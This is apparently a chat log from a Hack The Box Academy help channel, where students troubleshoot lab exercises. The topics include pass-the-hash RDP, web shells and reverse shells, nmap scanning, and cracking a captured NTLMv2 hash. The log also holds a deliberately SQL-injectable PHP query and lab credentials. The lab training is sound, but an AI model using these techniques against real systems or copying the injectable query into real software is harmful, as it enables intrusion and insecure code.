I'm in the Password Attacks module, section Pass the Hash, where we have to enable restricted admin mode in order to RDP into the host, but it's not working for some reason... xfreerdp keeps asking for a password, any ideas?
why would you ask that in this server? 🤔
So thats a 'thumbs up'?
Oops i'm sorry wrong server
yes
Are you sure the hash is correct?
My 'braa' scan showed an email address and username. I am guessing that may be pertinent to this task?
yep, I copy-pasted it and can log in with psexec and evil-winrm just fine, I got the answer without using RDP but I'd still like to know why it isn't working
yes
Try to run the command from psexec or winrm then try rdp again, I think it should work
that's what I did, the first screenshot is from psexec, but I'll try from winrm too
yes that was the problem, i tried again while escaping $ and it worked perfect
same result
Why "131" in rdp command?
i used evil-winrm for that so give that a try maybe
that's not part of the command
I did try, seems like I'll probably have to do the whole thing without RDP
It should work, I did it this way
I'll reset the target and see if that helps
I'm stuck on Attacking Common Applications - Attacking Tomcat, I have not been able to find the flag. Ive tried find / -name tomcat_flag.txt 2>/dev/null But this is all I get as the output I get. Am i missing something?
Do you think I should now try looking at a different port with that email address, like pop3 or ssh?
why simply not get a reverse shell session?
that’s what you should do
Okay. is this Server certificate on the pop3 server from openclient the 'id_rsa.pub' I would create
nobody's in the newb channels
hi
One of the modules I'm doing has this code:
$searchInput = $_POST['findUser'];
$query = "select * from users where name like '%$searchInput%'";
$result = $conn->query($query);
A bug bounty hunting course and it's giving me insecure code 😹
huh? the point of the CBBH path is to find insecure code and learn how to exploit it
this way worked so far, and i'm fine with sending through my commands in curl
Yeah but it's not yet at the section talking about exploits, it's giving examples of relational databases and how they work
after getting a shell that same command should work because i have the same command in my note
or maybe you can try to url encode that command a bit more
you need valid credentials for that
This certificate isn't a valid id_rsa.pub?
Since you guys are communicating back and forth take to dms
nope, resetting did nothing
Also @cedar void keep moving until you hit a wall its not learning if you keep asking a question every time you just do something
This is the output that I get after encoding the URL
🤷♂️ that's why it's better to get a shell
Because the find command outputs multiple lines. The webpage and parser aren't dynamic
Depending on the web shell you have, commands like find and others, that print out the output to standard out as soon as they have results will be degraded. Meaning that you won't be able to see the results as the "connection" with your webshell is getting closed (simply put)
well, doesn't seem like it can be done without RDP...
You can think of a way to improve your command by simply trying to save the outputted results from the find command to a file for example
And then you can query that file with cat or else
why the Cross-Site Scripting (XSS) module Target doesn't work
I'm not aware of anything, but any other way to pass the hash apart from xfreerdp?
have you made the change in the registry entry in the target?
yes, I did that many times with different tools, it doesn't work
Once you have a session on the target, there is only one tool that can make the change
You cannot RDP into the target straight after you've spawned it
I meant that I tried the command with psexec and evil-winrm, neither works, xfreerdp keeps demanding a password when I try to pass the hash
Does the same behaviour continue if you use the workstation in academy
thanks for the suggestion, I will try that as well, although tbh I'm not a fan of exercises that can't be completed from my own VM
I get an entirely different error in the pwnbox
No protocol specified [17:16:51:566] [2814:2814] [ERROR][com.freerdp.client.x11] - failed to open display: :1 [17:16:51:566] [2814:2814] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.
the command you are running please ?
it finally worked... but I really shouldn't have to switch to the pwnbox for this
Eh sometimes things are dumb
I'm just worried I'd have to do something like this in the exam
You can respawn a target and it'll work on your machine the second time
yeah, that happens, unfortunately didn't help in this case
it works fine , on my vm
if it's any consolation I don't recall needing to use pwnbox for that section personally ¯_(ツ)_/¯
(╯°□°)╯︵ ┻━┻
Ikr happens alot
thank you for the help, D0s3nt, MarcieLee and dpgg, finally completed the section from the Pwnbox
lmao, not the next section giving the admin password 😭
no it was the ||Logins.kdbx|| file
has anyone tried to sign up on the wpscan website to get access to the free api key lately? Been waiting like 3 days for the verification email to come through to activate my account. starting to think its not coming
lately no, but it's not supposed to take that long.. you might want to try again and make sure you entered the correct email
yeah im pretty sure i put the email correctly. even tried a second one. very odd
Hi all I'm new to the channel so I hope this is the right place to ask,
I'm currently on the cbbh track and have trouble with some modules using a kali box with vpn. Running the same cmds on htbs' parrot and my kali produce different results. My assumption is it's something about the vpn connection. For example in the Web Service & API Attacks module (just following along) I can ping the target, can run http://<TARGET IP>:3002/wsdl but http://<TARGET IP>:3002/wsdl?wsdl won't work. Proceeding a little further the python script client.py returns ....<success>false</success><error>This function is only allowed in internal networks</error>.... (That's why I'm assuming it's a network issue). Reconnecting vpn or respawning the target didn't fix the issue...
I'm worried what to do if something like this happens in the exam and if anyone else encountered similar issues.
Umm hi?
need help in the following question in SIEM module :
Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard". Extend the visualization we created or the "User added or removed from a local group" visualization, if it is available, and enter the common date on which all returned events took place as your answer. Answer format:
Does anybody know how long it takes to get this working? I'm on Attacking Common Services, Attacking FTP. I reset the machine, do an nmap scan for all ports. I let it sit for 30 minutes and nothing. I repeat and repeat, I've been doing this for hours. https://academy.hackthebox.com/module/116/section/1165
nmap scan should take less than 1 minute
in these modules
first check connection with an icmp trace using ping
post your command
nmap -p- --min-rate 2000 -n -Pn <IP>
nmap -sC -sV -p- 10.129.114.8
also add -v
for real?
sometimes nmap will decide to do a tcp connect scan instead of the normal default Syn scan
i usually do -oG allports
ohh, so after an all port scan, then do an sC for the open ports?
you can spot if this happens by turning on verbosity
I get it, thanks so much
-vvv also good as madfox pointed out
Can I DM anyone about the Footprinting HARD lab? I been trying to figure out the key for a few hours and I hit many walls
eh I do -sC -sV on all ports all the time
lol
good job then but no reason to do that xD
dont even need three, just one is enough to see if its accidentally doing a connect scan
more verbosity
cause a connect scan will def take 30+ minutes for all ports
yeah. Im just saying its not necessary for the specific issue Ive seen
literally had it happen to me two days ago
maybe your Internet is just ass
that has to be something more :/
and discovering the actual problem from our side is difficult
-T5
T5 is independent of syn or not
Can I DM anyone about the Footprinting HARD lab? I been trying to figure out the key for a few hours and I hit many walls
did you try with --min-rate
no I just did ||nmap -sV -p- 10.129.254.24 -v -T5||
why run sV on all ports
its w.e
ok lol
i like to discover open ports first
then run sCV only on open ports
ippsec does scv on all ports
iirc
That sounds like a good idea, I appreciate you all for opening my eyes
you are right i had to be missing it with other flag
its kind of difficult to remember all nmap flags 🤣
Personally I dont see it making a difference in total scan completion times(script and version checks are ran after port discovery anyways)
but it can be nice if you want some quick feedback and start poking some obvious stuff right away
I forget the order but doesn't it run each separately in terms of script and version scans idk which it does first
hi, I'm stuck on "Live Engagement, question 2"
module: shells & payloads
It's asking me to upload a reverse shell but I'm unsure how as I cannot find the "upload page" ://
Hello, I need help on Documentation & Reporting Practice Lab first question, can anyone give me hint or the way to get the admin cred? i tried everything i can to login but incorrect 
yes 🙌
Anyone able to help with broken authentication skills assessment? I've gotten a decent bit in and am not sure how much to type out without spoilers
Anyone know how to fix the clock skew issue when using targetedKerberoast.py? I already tried sudo ntpdate <DC IP>
this is an old comment, but this just helped me. Couldn't find a browser to utilize.
Thanks for this ^^
Hi, on SQLMAP ESSENTIALS > Attack Tuning > What's the contents of table flag6? (Case #6) : When running sqlmap with ||risk3||, it detects ||a Timed based heavy query SQLi||. I got the flag that way but it was pretty slow. I wonder if there was a "simpler way of getting the flag" or if there is a way to "fine tune sqlmap so that the heavy query is not that long" (8 queries per minute leads to more than 2 hours getting that flag lol)
If someone is available to talk here or in DM about the resolution, that would be nice please 🙂
Hi, i'm on ATTACKING COMMON SERVICES - EASY
after pwning credentials user and pass, trying to upload a webshell via sql INTO OUTFILE, i can not find the directory path. any hint?
Hey, anyone done the Credentials in Object Properties section on the Windows Attacks & Defense module? i'm stuck on question 3, i did filter for the id 4771 that none of them are bonni user. I also noticed that the new login success or failure are not generating only for this id. I tried updating the policy setting in the backend but it's still the same. Can anyone give me a hint please?
If you’re on VBox, you may have to disable the setting that syncs your VM’s time with your host’s time iirc
Or you do what I do when I’m lazy and run all of the commands you want to do on one line, which works sometimes
You're uploading to the web root, figure out what web service it's using and Google what the web root is for it
can anyone help me try to crack this mssql hash? Its from Attacking Common Services. Am I supposed to use John? Because I tried and its saying "No password hashes loaded"
I use the command john --format=mssql hash.txt
What did you copy and paste into the hash.txt file? Sounds like you are missing part of the hash
yeah I did
I mean I echoed into a txt, it looks lik its all there
did you also include the password file in the command? John may think hash.txt is the file with the list of passwords. Your command should be something like john --format=mssql hash.txt rockyou.txt
I totally forgot the password file
wow
It happens
idk its still not working
what is the complete command you are using?
You also have to make sure there are no broken up lines in the hash.txt file
and try removing some of the beginning parts of the hash that john doesn't need
john --format=mssql hash.txt pws.list
I tried taking out some parts too
Is the pws.list the password list provided by the module?
yes, like :mssqlsvc::WIN-02:80f3f389d1a06c000
not a valid format
dang
i think this is a NetNTLMv2 hash btw xD
or v1 sorry
yes
mssqlsvc is just the name of the account...not the name of the type of hash
^
it says NTLMv2-SSP hash
run it with hashcat without specifying the hash type
john should be able to crack it
in your command, you are telling john it is --format=mssql
you are specifying the wrong hash type
ohhh
look up in the hashcat wiki what the mode number is for NTLMv2-SSP
did you do the information security foundations path?
Then hashcat -m <mode number> hash.txt pws.list
whelp that worked
@elfin cedar
im in too deep
I just thought I was getting a mssql hash because the target was a mssql database
Use this tool to identify, detect, and analyze hashes online
responder is a network poisoner
you cant get a local hash, such as mssql hash, passing through the network
what you catch in responder are not password hashes but challenge responses used to authenticate the client
these challenge responses are hashed using the client credentials, then you can crack them using for example a dictionary attack
this is why Kerberos is better xD
Ty all
Anyone open to dm for help on File Upload Attacks skills assessment? I have the source code and I've found some allowed extensions, but I'm stuck on at least 1 of the filters
sure shoot me a dm if you still need help
can i dm someone real quick about the bloodhound module skill assessment (last question)? azure query is driving me nut (more like kicking me in my nut)
I completed that module. Feel free to DM me.
Got the flag, thanks though! Figured out I need to work with the image instead of trying to construct the whole thing from scratch.
In Secure Coding 101: JavaScript, where is the website with the JS script located at? The narrative doesn't give the target anywhere.
Which section are you in?
Code Review. The assessment in Unpacking requires to have the code, but I can't find the code as there is no target specified where I could get the code. 😢
Wow, I must be blind as hell. 😳 Thanks a lot.
Happens to the best of us
why did the friend referral not give me anything
Your friends have to complete the onboarding process
I'm not sure, but I think they have to complete modules for the onboarding process
what is modules of onboarding?
I think this will be shown to your friends after they sign up.
If you want to be sure, you have to ask the support.
ok
any of you having problems with the vpn not connecting? Ive tried EU 1 & 2 with both UDP and TCP but it doesn't connect. Worked fine yesterday.
nvm, its working after restarting my machine
quick note if you don't already know, after switching your vpn you'll have to restart your target to get a new because the old target is on your old vpn network (not 100% sure but it should be the same for the pwnbox)
who can help me this https://academy.hackthebox.com/module/51/section/1640
State your question more clearly
Tell what module and section you’re doing, what problem you’re having and what you’ve tried so far
Just follow the module. Everything is described in detail.
Hi everyone
I am stuck on Module: ATTACKING COMMON SERVICES, Section: Attacking DNS, Question: Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer. as well|| and found two subdomains h... and c... ||, but I am not able to continue from here.
no that have error
also stop spamming the same damn thing 🤣
Can someone DM to help with the session security skill assessment?
what?
I'm afraid I'll spoil too much if I write here
hint try the ||Subbrute|| that showed in that section
no it doesn't have any error and it doesn't mean that for answering the "Questions" you have to follow strictly what has been taught in the module
can I dm you?
beware he may ask the same thing lol
sure, but unless there is no way to avoid spoilers I would post what is your problem here since it can help others as well (as long as the use the CTRL+F to search through the chat history)
I'm not getting any connections to my php server even though all seems fine
This is what I did after restarting the machine, but it still tells me that there are import errors on line 2 and 1972
I told you to follow the module. Step by step
Hello buddies, Good Morning/Evening to Everyone here.
It worked after I restarted the box 🤷
I'm happy to meet y'all on here.
I'm a newbie in cybersecurity, I'm looking forward for a new resources, who can recommend for me and also I'm looking forward to network with cyber security experts in penetration testing.
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
as 0x56 said: "Tell what module and section you’re doing, what problem you’re having and what you’ve tried so far"
I tried every mention of this module, but it was all invalid, either using PoC or bypassing it
you can go to the link
You're probably doing something incorrectly
State the question you're on and what you've already tried
you can see this
What does your community contributor role mean?
State the question you're on
No, I followed his steps and checked carefully, in the poc my system version conforms, but the sudo version does not conform, but when I use the second bypass, it is also invalid
You're meant to use it on the target system
Connect to the spawned target
yeah,but is no have result
?
can I dm you give you the picture?
Why are you so stubbornly refusing to state the question you're stuck on?
It means I've been extremely helpful in resolving people's issues
Cool. Well done!
There's only one question on the linked page
Can't you read what I said above? Right here, why do people know what I'm asking
I don't have the module unlocked so I can't see
It's a simple get root flag question.
yeah,I think too
but now it is error
Screenshot
So we can stop going back and forth guessing
You just repeating that you're having issues isn't exactly helpful unless we actually know what is going wrong, and the resulting errors
My best guess is you're doing the POC on your own system, thinking you're on the other
But again it's a guess because you aren't actually helping us help you
The reason people earlier were being dicks about you just saying "help me" is because you don't provide enough context
I suggest reading http://dontasktoask.com as to why it's construed as annoying in an asynchronous text forum
Just completed Active Directory Enumeration & Attacks. Feeling 🔥 rn. I got really frustrated mid-way through the 2nd Skills Assessment, but it felt great when I knew exactly what to do for the final 2 questions. Awesome module and big thanks to everyone behind it! Learnt a lot.
@quick crane that wasn't an invitation to dm me, send your image here
I see you're not trying to do the sudo-hax-me-a-sandwich
Why?
no,I do it
thx marcie i can understand you have the blue helping role
Thanks I can barely help myself out of a wet paper bag
I’m on mobile, can’t go to the link. You’re the one that wants help pal, stop being so lazy lol
Hey,
Anyone solve the question in Detecting Kerberoasting/AS-REProasting - Module: Detecting Windows Attacks with splunk?
I am stuck on the question:
Modify and employ the Splunk search provided at the "Detecting Kerberoasting - SPN Querying" part of this section on all ingested data (All time). Enter the name of the user who initiated the process that executed an LDAP query containing the "*(&(samAccountType=805306368)(servicePrincipalName=*)*" string at 2023-07-26 16:42:44 as your answer. Answer format: CORP\_
I already saw that in Splunk but I don't user and the ProcessName is N/A
Any hint from who solved it?
I have a question about the Active Directory Enumeration & Attacks Module, can i DM someone?
You can ask your question here
Module: Active Directory Enumeration & Attacks, Section: Privileged Access i cant connect to ssh: "open a PowerShell console on MS01 and SSH to 172.16.5.225 with the credentials htb-student:HTB_@cademy_stdnt!."
Are you sure this is in privileged access? I don’t see this question
It is mentioned under "Scenario Setup", however I haven't used SSH to connect to the target ".255" nor do I remember having followed the learning material
there is also a compiled binary you can use directly on Windows
Where?
Is your question about ssh or about the last question?
I think i need to ssh into linux to run the py script to get the flag for the last question. But ssh cant connect
I advise you to google and search for it, moreover you have to trust that compiled binary
I have no issue with ssh to the Linux box
Just tested
I ran a power shell as administrator, then I did the same command as you did
Make sure you correctly copy the password
And paste
I had the same issue as well
I have, do you use pwn box?
Yes I used pwnbox
ok im not, i try it in pwnbox
Should not make a difference though
Yes, but I do the same as you
Try resetting the instance
I've already tried
Strange. Pwnbox or your own vm definitely shouldn’t make a difference
As you ssh from the rdp instance
im doing the skills assessment for hackthebox module using web proxies, and one question is about msf and using auxiliary/scanner/http/coldfusion_locale_traversal, and I can't appear to run against the host. I did
set RHOSTS xx.xx.xx.xx:30354
set PROXIES HTTP:127.0.0.1:8080
and I have burp suite running, now I try to run the module and it says Msf::OptionValidateError The following options failed to validate: RHOSTS with no other detail as to why
